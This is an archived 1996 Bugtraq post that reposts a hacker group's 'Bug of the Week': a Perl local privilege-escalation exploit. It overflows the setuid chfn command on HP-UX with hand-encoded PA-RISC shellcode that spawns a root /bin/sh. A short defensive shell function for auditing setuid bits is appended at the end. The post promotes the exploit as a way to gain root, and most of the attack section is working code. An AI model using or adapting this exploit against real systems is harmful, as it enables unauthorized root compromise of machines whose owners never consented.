Bugtraq mailing list archives
the HP Bug of the Week!
From: aleph1 () dfw net (Aleph One)
Date: Mon, 9 Dec 1996 02:47:46 -0600
From our friends at SOD:
This week: the continuing saga of buffer overflows in setuid root programs

Amid the struggle of the terrible workaday week, among the lost broken-hearted keypunching drones, alongside the workers in the dreaded server farm, Our Hero bravely sends the legally forbidden datastream across the burning wires toward a cold and lifeless shell of a shell. The electrons twist! The binary bits battle! The data bus swerves sharply to avoid hitting the eclectic keywords! Was the script executed in time to save Our Hero and his lovely Mistress? Were the exploitable programs still enabled setuid root? Will the buffers spill onto the stack and leave way to run a small semblance of illicit code? Of course they will, and you don't have to tune in next week to find out, either.

This week, the chfn command happily runs some code for us as root, and Otto Sync joins us as an honorary Scriptor with his exploits written especially for HP's OpenCall Service Control Point platform for SS7 telephony use -- oh, I don't know how well Alcatel is going to like this one! So snarf it, pop it open, and suck it down, and as always remember to start clicking your way to root access with scripts from those Superhero kind of folks at SOD.

_________________________________________________________________

Caveat Emptor: of.chfn changes uid's, too!
script for this week

_________________________________________________________________

#!/usr/bin/perl
use FileHandle;

sub h2cs {
    local($stuff)=@_;
    local($rv);
    while($stuff !~ /^$/) {
        $bob=$stuff;
        $bob =~ s/^(..).*$/$1/;
        $stuff =~ s/^..//;
        $rv.=chr(oct("0x${bob}"));
    }
    return $rv;
}

open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;

if ($rev eq "10") {
    $offset=2070;
    $prealign="AA";
    $postalign="PPPP";
    $pcoq=h2cs("7b03A013");
} else {
    $offset=2070;
    $prealign="AA";
    $postalign="PPPP";
    $pcoq=h2cs("7b033013");
}

$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506");   # LDI 643,r22
$code.=h2cs("96d60534");   # SUBI 666,r22,r22
$code.=h2cs("20200801");   # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008");   # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a");   # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd");   # BL .+8,r1
$code.=h2cs("08210280");   # NOP
$code.=h2cs("34020102");   # LDI 129,rp
$code.=h2cs("08410402");   # SUB r1,rp,rp
$code.=h2cs("60400162");   # STB r0,177(rp)
$code.=h2cs("b45a0154");   # ADDI 170,rp,arg0
$code.=h2cs("0b390299");   # XOR arg0,arg0,arg0
$code.=h2cs("0b180298");   # XOR arg0,arg0,arg0
$code.=h2cs("341604be");   # LDI 607,r22
$code.=h2cs("20200801");   # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008");   # BLE 4(sr7,r1)
$code.=h2cs("96d60534");   # SUB 666,r22,r22
$code.=h2cs("deadcafe");   # Illegal instruction -- dump core if exec fails

$data="/bin/sh.";          # Data stuff
$codedata=$code.$data;

$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;

exec("/usr/bin/chfn","$of");

Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
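The post's own question, "Were the exploitable programs still enabled setuid root?", is the one an administrator needs to answer on the defending side: the overflow only yields root because chfn carries the setuid bit. The shell functions below are an added example for that check; they are not part of the SOD post or the exploit above. They test the setuid bit on any paths given, report each one, and return the count of setuid files found, so the result can be acted on (clearing the bit with chmod u-s, or confirming it stays cleared after a patch). The path /usr/bin/chfn is the one the post uses; /usr/bin/passwd in the usage comment is an assumed second example.

```shell
#!/bin/sh
# Added example (not from the SOD post): verify whether programs still
# carry the setuid bit, the precondition that turns the chfn overflow
# into a root shell. POSIX sh only.

# is_setuid PATH
# Return 0 if PATH is a regular file with the setuid bit set, 1 otherwise
# (a missing path also returns 1).
is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# audit_setuid PATH...
# Print a one-line verdict per path and return the number of setuid
# files found (0 means nothing to mitigate). Owner and mode come from
# ls -ld so the reader can see whether the bit belongs to root.
audit_setuid() {
    found=0
    for p in "$@"; do
        if is_setuid "$p"; then
            printf 'SETUID  %s\n' "$(ls -ld "$p")"
            found=$((found + 1))
        elif [ -f "$p" ]; then
            printf 'ok      %s\n' "$p"
        else
            printf 'absent  %s\n' "$p"
        fi
    done
    return "$found"
}

# Usage on the binary the post targets (second path is an assumed example):
#   audit_setuid /usr/bin/chfn /usr/bin/passwd
#   echo "setuid files found: $?"
```

A non-zero return from audit_setuid is the signal that the mitigation (clearing the setuid bit, or replacing the binary with a fixed one) has not been applied; running it after the change should return 0 for the paths you cleared.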